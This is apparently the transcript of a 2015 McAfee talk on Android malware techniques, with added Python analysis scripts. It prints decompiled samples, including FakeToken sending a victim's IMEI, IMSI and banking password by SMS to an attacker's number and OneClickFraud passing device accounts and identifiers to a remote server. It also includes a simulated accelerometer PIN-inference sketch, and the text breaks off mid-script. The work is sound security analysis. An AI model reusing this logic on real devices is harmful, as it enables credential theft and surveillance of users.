Isn't it all just SMS-sending trojans?: Real advances in Android Malware

Jimmy Shah, Mobile Security Researcher, McAfee

Slide deck (27 pages), uploaded by jimmy-shah on 08-Jun-2015. Category: Mobile

DESCRIPTION

Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.

TRANSCRIPT

Page 1: Isn't it all just SMS-sending trojans?: Real Advances in Android Malware

McAfee Confidential—Internal Use Only

Isn't it all just SMS-sending trojans?: Real advances in Android Malware

Jimmy Shah

Mobile Security Researcher

Page 2

Let's look at the numbers

Page 3

Not just malware ...

[Bar chart "Malware vs PUP" (potentially unwanted programs), y-axis 0% to 100%. The two bars read 49.3% and 50.7%: roughly an even split between outright malware and PUPs in the sample set.]

Page 4

Almost everything but SMS-sending trojans

[Bar chart "By Category", x-axis 0% to 45%. Categories in chart order: Send Handset Info, Spyware, Adware, Sends Premium SMS, Fraud, Exploit, Rooting malware, Backdoor/Botnet, HackTool, Downloader/Installer. Bar values as extracted, in chart order: 42.0%, 21.7%, 8.7%, 18.8%, 2.9%, 23.2%, 2.9%, 27.5%, 4.3%, 10.1%. The values add up to well over 100%, so the categories are not mutually exclusive: one sample can be counted under several behaviours. The pairing of values to category labels is as extracted from the slide image and may not be exact.]

Page 5

Attacker Tricks

Page 6

Attacker Tricks - Encryption

• Simple
  – Obfuscations
    • Hiding SMS numbers/message text within plaintext HTML files
  – Substitution cipher
    • Config file containing encrypted SMS numbers/message text

Example of the first trick: the premium number and message text are buried inside a copy of a legitimate web page (here microsoft.com), in the middle of a CSS query string where nobody looks. <SMS#> and <MSG> are the presenter's placeholders for the real values:

<link rel="stylesheet" type="text/css" href="/en/shared/core/2/css/css.ashx?sc=/en/us/site.config&amp;pt=cspMscomHomePage&amp;c=cspMscomSiteBrand;cspSearchComponent;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVerticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js"></script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c

Example of the config layout: concatenated records, each holding a number, a message text and the price (in rubles) of that premium SMS, with number and text redacted:

<SMS#>::<MSG>::241.55руб.<SMS#>::<MSG>::173.88руб.<SMS#>::<MSG>::86.00руб.
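As an added example (this is not code from the talk or from any of the families it covers), here is a small Python extractor for the two layouts above: it pulls the [number:message] marker out of a decoy HTML page and splits the concatenated number::text::price records of a config file. The decoy page, the config records and the digit-substitution table are all constructed for this example; the slide does not give the real substitution alphabet, so the toy table stands in for it.

```python
import re

# Constructed sample (not from the talk): a copy of a legitimate page with the
# premium number and message text hidden in the CSS query string, in the
# "[<SMS#>:<MSG>]" position the slide shows. Number and text are made up.
DECOY_HTML = (
    '<link rel="stylesheet" type="text/css" href="/en/shared/core/2/css/css.ashx'
    '?sc=/en/us/site.config&amp;pt=cspMscomHomePage&amp;c=cspMscomSiteBrand;'
    'cspSearchComponent;cspMscomFeaturePanel;[3855:SHAR 7]cspMscomNewsBand;'
    'cspAdControl" /><meta name="Title" content="Microsoft.com" />'
)

# Constructed sample config in the slide's "number::text::price" layout; records are
# simply concatenated and each one ends with the ruble suffix.
CONFIG_PLAIN = "3855::SHAR 7::241.55руб.7122::ACT 12::173.88руб.9151::GO::86.00руб."

# Hypothetical substitution table standing in for the real one (not given on the
# slide): every digit is replaced by a letter. Decryption is the inverse table.
# The toy only touches digits, so message text is kept upper-case to avoid collisions.
SUBST_ENC = str.maketrans("0123456789", "qwertyuiop")
SUBST_DEC = str.maketrans("qwertyuiop", "0123456789")
CONFIG_ENCODED = CONFIG_PLAIN.translate(SUBST_ENC)

HIDDEN_RE = re.compile(r"\[(\d{3,})\s*:\s*([^\]]+)\]")
RECORD_RE = re.compile(r"(\d+)::(.*?)::(\d+(?:\.\d+)?)руб\.")


def extract_hidden_sms(html: str) -> list[tuple[str, str]]:
    """Pull every [number:text] marker out of a decoy HTML page."""
    return [(m.group(1), m.group(2).strip()) for m in HIDDEN_RE.finditer(html)]


def parse_config(text: str) -> list[dict]:
    """Split concatenated number::text::price records into dicts."""
    return [
        {"number": n, "text": t, "price_rub": float(p)}
        for n, t, p in RECORD_RE.findall(text)
    ]


def decode_config(encoded: str) -> list[dict]:
    """Undo the digit substitution, then parse the recovered plaintext config."""
    return parse_config(encoded.translate(SUBST_DEC))


def total_cost_rub(records: list[dict]) -> float:
    """What one pass through the config would bill the victim."""
    return sum(r["price_rub"] for r in records)


if __name__ == "__main__":
    print(extract_hidden_sms(DECOY_HTML))
    records = decode_config(CONFIG_ENCODED)
    for rec in records:
        print(rec)
    print("total:", round(total_cost_rub(records), 2))
```

Both regexes are deliberately loose about whitespace and text content; in practice the number pattern and the record separator are what you pin down after one look at a decrypted sample, and the price field is the quickest way to rank which records actually cost the victim money.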

Page 7

Attacker Tricks - Encryption

• Complex
  – Symmetric cipher: DES
    • Encrypt URL queries and C&C commands
    • Encrypt/decrypt config file
      – URLs, next connect time
    • Encrypt/decrypt C&C commands
    • Decrypt root exploits

Decompiled example: the sample builds a DES decryptor from a key that ships inside the APK as the static field k.b:

byte abyte1[] = k.b;                                   // key bytes hardcoded in the APK
DESKeySpec deskeyspec = new DESKeySpec(abyte1);        // DESKeySpec uses the first 8 bytes
javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
Cipher cipher = Cipher.getInstance("DES");             // bare "DES" means DES/ECB/PKCS5Padding
b = cipher;
cipher.init(2, secretkey);                             // 2 == Cipher.DECRYPT_MODE

Because the key is a constant in the code, an analyst can lift it and decrypt the config, the C&C traffic and the packed exploits offline; and single DES in ECB mode would offer little protection even with a secret key. The encryption is there to hide strings from static scanners, not to resist analysis.
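Added example (not the talk's code): a triage script over decompiled Java that recognises the pattern above and lifts the key. The decompiled excerpt is constructed to mirror the slide's snippet, including a made-up static key array k.b; the class and method names are hypothetical.

```python
import re

# Constructed decompiled-Java excerpt (not the talk's sample): the key bytes sit in a
# static array and the cipher is assembled exactly the way the slide shows.
DECOMPILED = """
public class k {
  public static byte[] b = { 107, 51, 100, 50, 57, 122, 113, 88 };
}
public class a {
  void d() {
    byte abyte1[] = k.b;
    DESKeySpec deskeyspec = new DESKeySpec(abyte1);
    SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
    Cipher cipher = Cipher.getInstance("DES");
    cipher.init(2, secretkey);
  }
}
"""

# javax.crypto.Cipher mode constants; decompilers print them as bare integers.
CIPHER_MODES = {1: "ENCRYPT_MODE", 2: "DECRYPT_MODE", 3: "WRAP_MODE", 4: "UNWRAP_MODE"}

GETINSTANCE_RE = re.compile(r'Cipher\.getInstance\("([^"]+)"\)')
INIT_RE = re.compile(r"\.init\(\s*(\d)\s*,")
KEYSPEC_RE = re.compile(r"new\s+DESKeySpec\(\s*(\w+)\s*\)")
ARRAY_RE = re.compile(r"byte\[\]\s+(\w+)\s*=\s*\{([^}]*)\}")
ALIAS_RE = re.compile(r"byte\s+(\w+)\[\]\s*=\s*(?:\w+\.)?(\w+)\s*;")


def normalize_transformation(t: str) -> str:
    """A bare algorithm name gets the JCE defaults: ECB mode, PKCS5 padding."""
    return t if "/" in t else f"{t}/ECB/PKCS5Padding"


def find_static_byte_arrays(src: str) -> dict[str, bytes]:
    """Collect byte[] initializers; Java bytes are signed, so mask each to 0..255."""
    return {
        name: bytes(int(v) & 0xFF for v in body.split(",") if v.strip())
        for name, body in ARRAY_RE.findall(src)
    }


def triage(src: str) -> dict:
    """Summarize the sample's javax.crypto usage and recover any hardcoded DES key."""
    report = {"transformations": [], "modes": [], "keys": {}}
    for m in GETINSTANCE_RE.finditer(src):
        report["transformations"].append(normalize_transformation(m.group(1)))
    for m in INIT_RE.finditer(src):
        report["modes"].append(CIPHER_MODES.get(int(m.group(1)), "UNKNOWN"))
    arrays = find_static_byte_arrays(src)
    aliases = dict(ALIAS_RE.findall(src))            # local array name -> static field it copies
    for m in KEYSPEC_RE.finditer(src):
        local = m.group(1)
        field = aliases.get(local, local)
        if field in arrays:
            report["keys"][local] = arrays[field][:8].hex()   # DESKeySpec uses only 8 bytes
    return report


if __name__ == "__main__":
    for item, value in triage(DECOMPILED).items():
        print(item, value)
```

The recovered key goes straight into any DES implementation to decrypt the sample's config and C&C traffic. The same scan is worth running for "AES" and "Blowfish" too: the giveaway is not the algorithm but the init() mode paired with a key that comes from a constant rather than from a key-derivation step or the network.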

Page 8

Attacker Tricks – Fraud

• Pretending to be a legitimate app
  – Not the same as injecting malicious code
  – New or reused code that simulates the real app
    • Includes malicious functions
    • Almost just malicious code

Android/OneClickFraud class listing. The whole app is the Android SDK's KitchenTimer sample, still under its com.example.android.service package, with the fraud logic bolted on:

./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class

Android/FakeToken class listing. There is no legitimate app underneath at all; the class names (SmsReciver, AutorunReceiver, WebApi, UpdateActivity) describe a bot client:

./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class

Page 9

Attacker Tricks – Fraud

• Android/FakeToken
  – Fake security token app
    • Customized for different banks
  – App asks for the user's password and displays a fake soft token

Decompiled: on first use the app registers the victim with the operator by SMS, sending the IMEI, the IMSI and the banking password just typed in to the attacker's number, then hands the password to a background worker:

public void sendPass(String paramString) {
  try {
    if (!Settings.saved.sendInitSms) {
      Settings.saved.sendInitSms = true;                 // only the first password triggers the INIT message
      String str = Settings.saved.smsPrefix + " INIT " + MainApplication.imei + " "
                   + MainApplication.imsi + " " + paramString;
      MainService.sendSms(Settings.saved.number, str);   // attacker-controlled number from the config
      MainApplication.settings.save(this.context);
    }
    new Thread(new ThreadOperation(this, 1, paramString)).start();   // operation 1: background handling of the password
    label109: return;
  } catch (Exception localException) {
    break label109;                                      // decompiler artifact: any error is silently swallowed
  }
}

Page 10

Attacker Tricks – Fraud

• Android/OneClickFraud
  – Fake adult entertainment app
    • App asks the user to pay for a subscription to the adult site
      – Repeats every 5 minutes

Decompiled: the KitchenTimer sample's own timer service is reused as the nag scheduler:

public void onReceive(Context paramContext, Intent paramIntent) {
  kitchenTimerService.schedule(300000L);   // 300 000 ms = 5 minutes until the next payment demand
  setContentView(2130903040);              // 0x7f030000: an R.layout resource, the payment screen
  Account[] arrayOfAccount;

Page 11

Attacker Tricks – Fraud

• Android/OneClickFraud
  – Sends user information, including the Google account, to the attacker

Decompiled: runs once (guarded by the ctf flag), collects the device's identifiers and account names, and passes them to the attacker's server in the query string of the payment page it opens in the browser. The account loop and the final URL assembly are garbled by the decompiler:

if (ctf.intValue() == 0) {
  Main localMain = Main.this;
  Integer localInteger = Integer.valueOf(1);
  localMain.ctf = localInteger;
  TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
  arrayOfAccount = AccountManager.get(Main.this).getAccounts();   // every account on the device, incl. the Google account
  str1 = "";
  int i = arrayOfAccount.length;
  j = 0;
  // (loop appending each account name to str1 elided by the decompiler)
  if (j >= i) {
    String str2 = doPost("http://<removed>", "");                 // registers with the server, gets a user id back
    StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
    String str3 = localTelephonyManager.getDeviceId();            // IMEI
    StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
    String str4 = localTelephonyManager.getLine1Number();         // phone number
    Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
    Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);   // open the payment page, data in the query string
    startActivity(localIntent1);
    boolean bool = moveTaskToBack(1);
  }
}

Page 12

4/19/12

Attacker Tricks - Injecting code

• Android/Moghava.A
  – Malicious code injected into a legitimate app
    • Recipes for Iranian meals

Page 13

Attacker Tricks - Injecting code

• Android/Moghava.A
  – Real virus
    • Overwriting file infector
      – Not executable files, just image files
        » Specifically all of your JPGs
        » Designed to "photo bomb" all your photos with Ayatollah Khomeini
  – Code injection
  – Buggy
    • Doesn't check whether it has infected a file before

Class listing: the injected com/Moghava package sits next to the original app's ir/sharif/iranianfoods package in the same APK:

./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
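The three class listings in this deck (OneClickFraud on page 8, FakeToken on page 8, Moghava.A above) each show a different shape, and a package-level summary is enough to tell them apart: copied SDK sample code under com.example, a package made entirely of bot-like classes, and two unrelated namespaces in one APK. As an added example (not code from the talk), this Python script produces that summary from a class listing. The listings are abbreviated from the slides; the token list and the "reverse-domain owner" heuristic are this example's own choices.

```python
from collections import defaultdict

# Class listings as shown on the slides (abbreviated): Android/OneClickFraud,
# Android/FakeToken and Android/Moghava.A.
ONECLICKFRAUD_LISTING = """
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/Main.class
./com/example/android/service/R$layout.class
"""
FAKETOKEN_LISTING = """
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/SendSmsResult.class
./token/bot/AutorunReceiver.class
./token/bot/SmsReciver.class
./token/bot/UpdateActivity.class
./token/bot/MainService.class
"""
MOGHAVA_LISTING = """
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
"""

# Name fragments that rarely occur in a recipe or timer app but do in bot clients.
SUSPICIOUS_TOKENS = ("sms", "bot", "autorun", "webapi", "update", "alarm")
# Namespace of the Android SDK samples; in a shipped APK it means copied template code.
TEMPLATE_PREFIXES = ("com.example",)


def parse_listing(listing: str) -> list[tuple[str, str]]:
    """Turn './a/b/C$1.class' lines into (package, outer_class) pairs."""
    pairs = []
    for line in listing.strip().splitlines():
        path = line.strip().lstrip("./").rsplit(".", 1)[0]   # drop ./ and .class/.smali
        *pkg, cls = path.split("/")
        pairs.append((".".join(pkg), cls.split("$", 1)[0]))  # inner classes fold into the outer one
    return pairs


def summarize(listing: str) -> dict[str, dict]:
    """Per package: distinct outer classes, suspicious name hits, template-namespace flag."""
    pkgs = defaultdict(lambda: {"classes": set(), "hits": set()})
    for package, cls in parse_listing(listing):
        entry = pkgs[package]
        entry["classes"].add(cls)
        haystack = f"{package}.{cls}".lower()
        entry["hits"].update(t for t in SUSPICIOUS_TOKENS if t in haystack)
    return {
        p: {"classes": len(e["classes"]), "hits": sorted(e["hits"]),
            "template": p.startswith(TEMPLATE_PREFIXES)}
        for p, e in pkgs.items()
    }


def owner(package: str) -> str:
    """Reverse-domain owner part of a package, e.g. 'com.example' or 'ir.sharif'."""
    return ".".join(package.lower().split(".")[:2])


def findings(listing: str) -> list[str]:
    """Reasons an APK looks like reused template code, a pure bot, or an injected package."""
    summary = summarize(listing)
    notes = []
    owners = sorted({owner(p) for p in summary})
    if len(owners) > 1:
        notes.append("unrelated namespaces in one APK: " + ", ".join(owners))
    for package, info in sorted(summary.items()):
        if info["template"]:
            notes.append(f"{package}: SDK sample namespace, likely copied template code")
        if info["hits"]:
            notes.append(f"{package}: bot-like class names ({', '.join(info['hits'])})")
    return notes


if __name__ == "__main__":
    for name, listing in [("OneClickFraud", ONECLICKFRAUD_LISTING),
                          ("FakeToken", FAKETOKEN_LISTING), ("Moghava.A", MOGHAVA_LISTING)]:
        print(name, findings(listing))
```

The namespace check is the one that catches injection: a repackaged app keeps the victim app's package and gains a second one from a different owner. Real APKs also bundle library namespaces (ad SDKs, support libraries), so in practice the owner set is compared against an allow-list of known libraries before anything is flagged.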

Page 14

Attacker Tricks - Injecting code

Decompiled (stamper): the bundled picture is drawn over each of the victim's JPEGs. Nothing marks a file as already stamped, so the same photo gets another copy on every run:

int i3, i4;
Bitmap localBitmap3;
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);   // 0x7f020001: the Khomeini drawable bundled in the APK
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());                     // the victim's JPEG
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
int i1 = m;
int i2 = n;
if (i1 > i2)   // only photos wider than the overlay get stamped
{
  i3 = localBitmap2.getWidth();
  i4 = localBitmap2.getHeight();
  label122: Bitmap.Config localConfig = Bitmap.Config.ARGB_8888;
  localBitmap3 = Bitmap.createBitmap(i3, i4, localConfig);   // fresh canvas the size of the photo
  Canvas localCanvas = new Canvas(localBitmap3);
  float f1 = 0.0F;
  float f2 = 0.0F;
  Paint localPaint1 = null;
  localCanvas.drawBitmap(localBitmap2, f1, f2, localPaint1);   // the photo first
  float f3 = 100.0F;
  float f4 = 300.0F;
  Paint localPaint2 = null;
  localCanvas.drawBitmap(localBitmap1, f3, f4, localPaint2);   // then the overlay at a fixed (100, 300) offset
  // localBitmap3 is then written back over the original file (not shown on the slide)
}

Page 15

Attacker Tricks - Injecting code

Credit: Mark Peters (Flickr ID - sneakerdog)

Page 16

Attacker Tricks – Recording Audio

• Audio
  – DTMF ("Touch Tones")
  – Telephone calls
• Initially used in academic PoCs
  – Soundcomber (January 2011): records what the victim keys into IVR (interactive voice response) systems and converts the DTMF tones back into digits using a database of IVR menus
• Very common in spyware
• Used in malware

Page 17

Attacker Tricks – Recording Audio

• Android/Nickispy
  – Records calls to AMR files
  – August 2011
• Android/GoldenEagle
  – Records to AMR files
  – September 2011
• What audio recording gets the attacker
  – Trade secrets
  – Credit card numbers
  – PINs

Page 18

Attacker Tricks - Malware Updates

• Malware authors are now including update functionality
  – Keeping the profits rolling in and maintaining control of devices
  – Initially just used by mobile botnet clients
• Generally only requires the permission INSTALL_PACKAGES (android.permission.INSTALL_PACKAGES)
  – Caveat: INSTALL_PACKAGES has a signature/system protection level, so a sideloaded third-party app can request it but is never granted it. In practice a trojan downloads the new APK and hands it to the platform package installer (an ACTION_VIEW intent on the file with MIME type application/vnd.android.package-archive), which works only if the user has enabled unknown sources and taps through the install prompt. Seeing INSTALL_PACKAGES requested in a manifest is still a useful tell, since legitimate apps do not ask for it.
• There are two main ways users are attacked
  – Fake legitimate updates
    • Ex: SYSTEM_PATCH, Android_4.0_patch
    • Really just trojan horses
  – Malware updating itself
    • More functions
      – Send sensitive user info
      – Exfiltrate data
    • New/patched payloads
      – Exploits

Page 19

Attacker Tricks - Malware Updates

• Real malware updates
  – Because even the bad guys understand that sometimes you need to patch
• Usually not visible
  – Don't inform the users/victims
  – Don't depend on users to approve updates (an update that needs no user interaction either runs on an already-rooted device, or pulls in new code at runtime, e.g. a downloaded DEX file, rather than installing a new package)
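As an added example (not code from the talk), a Python triage pass over a decoded manifest and a decompiled snippet that answers the update question the two slides above raise: can this app fetch a file, does it survive a reboot, does it hand an APK to the package installer, and is the INSTALL_PACKAGES request just noise? The manifest, the snippet, the app label and the class names are all constructed for this example; the list of ungrantable permissions is taken from the Android framework's protection levels.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"

# Constructed decoded manifest (apktool-style); not from any real sample.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.systempatch">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.INSTALL_PACKAGES"/>
  <application android:label="SYSTEM_PATCH">
    <receiver android:name=".AutorunReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <service android:name=".UpdateService"/>
  </application>
</manifest>"""

# Constructed decompiled snippet: the install path a sideloaded app can actually use.
UPDATE_CODE = """
Intent i = new Intent(Intent.ACTION_VIEW);
i.setDataAndType(Uri.fromFile(new File("/sdcard/Android_4.0_patch.apk")),
                 "application/vnd.android.package-archive");
i.setFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
context.startActivity(i);
"""

# Permissions reserved for platform-signed or system apps: a third-party APK may
# request them, but the package manager never grants them.
PRIVILEGED_ONLY = {"android.permission.INSTALL_PACKAGES", "android.permission.DELETE_PACKAGES"}
APK_MIME_RE = re.compile(r"application/vnd\.android\.package-archive")


def permissions(manifest_xml: str) -> set[str]:
    root = ET.fromstring(manifest_xml)
    return {e.get(NAME) for e in root.iter("uses-permission")}


def boot_receivers(manifest_xml: str) -> list[str]:
    """Receivers registered for BOOT_COMPLETED: persistence across reboots."""
    root = ET.fromstring(manifest_xml)
    return [r.get(NAME) for r in root.iter("receiver")
            if any(a.get(NAME) == "android.intent.action.BOOT_COMPLETED" for a in r.iter("action"))]


def update_capability(manifest_xml: str, code: str) -> dict:
    """Combine manifest facts with a code scan into an update-capability report."""
    perms = permissions(manifest_xml)
    root = ET.fromstring(manifest_xml)
    label = root.find("application").get(f"{{{ANDROID_NS}}}label") or ""
    report = {
        "requested_but_ungrantable": sorted(perms & PRIVILEGED_ONLY),
        "can_download": "android.permission.INTERNET" in perms,
        "boot_persistence": boot_receivers(manifest_xml),
        "hands_apk_to_installer": bool(APK_MIME_RE.search(code)),
        "update_themed_label": "patch" in label.lower() or "update" in label.lower(),
    }
    # Network access plus the installer hand-off is what makes a self-updater; the
    # INSTALL_PACKAGES request changes nothing except that it marks the app as suspicious.
    report["likely_self_updater"] = report["can_download"] and report["hands_apk_to_installer"]
    return report


if __name__ == "__main__":
    for key, value in update_capability(MANIFEST, UPDATE_CODE).items():
        print(f"{key}: {value}")
```

The code scan is deliberately a plain string search: the MIME type is the one constant the installer hand-off cannot do without, so it survives the identifier renaming discussed under server-side polymorphism later in the deck.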

Page 20

Academic Research - Taplogger

• Taplogger
  – Combination training and attack app
    • Reads the accelerometer to detect keypresses
    • Training app is a fake icon-matching game
      – High score = you have trained it to steal your PIN
    • Two attacks
      – Number pad logging: PINs, CC#s, etc.
      – Password stealing: screen unlock
  – Previous research
    • TouchLogger
      – Two parts: training and logging
    • ACCessory
      – Detects full keyboard
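The training-then-attack split is the whole idea, so as an added example (not the Taplogger authors' code) here is the skeleton of it in Python, reduced to one feature pair: the game phase knows which key was tapped and averages the sensor reading per key; the attack phase, running while another app has focus, assigns each new reading to the nearest key. The per-key "tilt signatures" and the tap data are constructed, and the real attack uses richer features (several sensor axes, timing), so this is the shape of the technique rather than its accuracy.

```python
import math
import random

# 3x4 phone keypad. Hypothetical accelerometer reaction (x, y in m/s^2) per key:
# tapping the left column tilts the phone one way, the top row another.
# Constructed for this example; the real attack learns these per device.
KEYPAD = ["1", "2", "3", "4", "5", "6", "7", "8", "9", "*", "0", "#"]


def key_signature(key: str) -> tuple[float, float]:
    idx = KEYPAD.index(key)
    col, row = idx % 3, idx // 3
    return ((col - 1) * 0.8, (row - 1.5) * 0.6)


def synth_tap(key: str, rng: random.Random, noise: float = 0.05) -> tuple[float, float]:
    """One simulated tap: the key's signature plus sensor noise (constructed data)."""
    cx, cy = key_signature(key)
    return (cx + rng.gauss(0, noise), cy + rng.gauss(0, noise))


def train(labelled: list[tuple[tuple[float, float], str]]) -> dict[str, tuple[float, float]]:
    """Training phase: the fake game knows which key was tapped, so it averages the
    sensor readings per key into a centroid."""
    sums = {}
    for (ax, ay), key in labelled:
        s = sums.setdefault(key, [0.0, 0.0, 0])
        s[0] += ax
        s[1] += ay
        s[2] += 1
    return {k: (sx / n, sy / n) for k, (sx, sy, n) in sums.items()}


def classify(model: dict[str, tuple[float, float]], sample: tuple[float, float]) -> str:
    """Attack phase: nearest centroid to a reading taken while another app had focus."""
    ax, ay = sample
    return min(model, key=lambda k: math.hypot(model[k][0] - ax, model[k][1] - ay))


def recover_pin(model, taps) -> str:
    return "".join(classify(model, t) for t in taps)


def accuracy(model, rng: random.Random, per_key: int = 20) -> float:
    """Fraction of fresh simulated taps assigned to the right key."""
    trials = [(synth_tap(k, rng), k) for k in KEYPAD for _ in range(per_key)]
    return sum(classify(model, s) == k for s, k in trials) / len(trials)


def demo(seed: int = 7):
    rng = random.Random(seed)
    labelled = [(synth_tap(k, rng), k) for k in KEYPAD for _ in range(30)]   # the "game" phase
    model = train(labelled)
    pin = "4917"
    taps = [synth_tap(k, rng) for k in pin]                                  # victim enters a PIN
    return pin, recover_pin(model, taps), accuracy(model, rng)


if __name__ == "__main__":
    print(demo())
```

The defence side follows directly from the model: the attack needs sensor access while the foreground app has the keyboard, which is why later Android versions restrict background sensor sampling, and why a banking app's own PIN pad can randomise key positions so that a learned position-to-key map stops being useful.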

Page 21

Academic Research - Taplogger

Page 22

Attacker Tricks - Rooting Exploits

• Rooting Android
  – Good for improving security, but can leave you open to attack
  – Replacing firmware
  – Removing bloatware and security vulnerabilities
• Most attackers are not interested in developing their own exploits
  – A function of slow patching on Android and of the number of parties involved in releasing new firmware ("too many chefs in the kitchen")
  – Leads to the same three or four common exploits with minor modifications

Exploit               Detected as
PSneuter              Exploit/RetuenSP.A
Gingerbreak           Exploit/Voldbrk, 18 minor variants of the same exploit
Exploid               Exploit/Lvedu, 26 minor variants
RageAgainstTheCage    Exploit/Diutes, 5 minor variants

All four are public rooting tools repurposed by malware: PSneuter abuses ashmem to flip ro.secure, Gingerbreak targets the vold daemon (CVE-2011-1823), Exploid targets udev/netlink message handling (CVE-2009-1185), and RageAgainstTheCage exhausts the process limit so that adbd fails to drop root. The "minor variants" are mostly re-encodings and renamed binaries of the same code, which is why one detection per exploit covers them.

Page 23

Attacker Tricks – Server-Side Polymorphism

• Server-side
  – Uses the larger resources available server side vs. the lower-powered devices
  – Modifying DEX files
• Manual changes
  – Renaming source and recompiling
• Automated changes
  – Easier than it sounds
  – Scriptable text changes in source

Page 24

Attacker Tricks – Server-Side Polymorphism

• One major family: Android/FakeInstaller
  – Main generic signature
  – Supplementary detections for 25 variants
  – Changes
    • By day
    • By hour
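What "scriptable text changes in source" defeats is the file hash, and what a "generic signature" keys on is what those changes cannot touch. As an added example (not McAfee's signature logic and not FakeInstaller's code), this Python script fingerprints a smali method by its sequence of opcodes and framework API calls, with app-internal class names, method names, registers and string constants normalised away. The two smali variants are constructed so that only the renamable identifiers differ; the third lacks the SMS send.

```python
import hashlib
import re

# Two constructed smali methods that do the same thing; a server-side generator renamed
# the class, the method, the registers and the string constants between builds.
VARIANT_A = """
.class public Lcom/app/Installer;
.method private doSend()V
    const-string v0, "3855"
    const-string v1, "SHAR 7"
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v2
    const/4 v3, 0x0
    invoke-virtual {v2, v0, v3, v1, v3, v3}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    invoke-direct {p0}, Lcom/app/Installer;->showProgress()V
    return-void
.end method
"""
VARIANT_B = """
.class public Lorg/qz/Kq;
.method private a()V
    const-string v4, "7122"
    const-string v5, "ACT 12"
    invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    move-result-object v6
    const/4 v7, 0x0
    invoke-virtual {v6, v4, v7, v5, v7, v7}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    invoke-direct {p0}, Lorg/qz/Kq;->c()V
    return-void
.end method
"""
# Same shell, no premium SMS: a genuinely different program, so it must not match.
VARIANT_C = """
.class public Lcom/app/Installer;
.method private doSend()V
    invoke-direct {p0}, Lcom/app/Installer;->showProgress()V
    return-void
.end method
"""

FRAMEWORK_PREFIXES = ("Landroid/", "Ljava/", "Ljavax/", "Ldalvik/")
INVOKE_RE = re.compile(r"^(invoke-[\w/]+)\s+\{[^}]*\},\s*(L[^;]+;)->(\w+)(\([^)]*\)\S+)")
CONST_STR_RE = re.compile(r"^const-string(?:/jumbo)?\s")


def tokens(smali: str) -> list[str]:
    """Normalise a method body to what a renaming generator cannot change."""
    out = []
    for raw in smali.splitlines():
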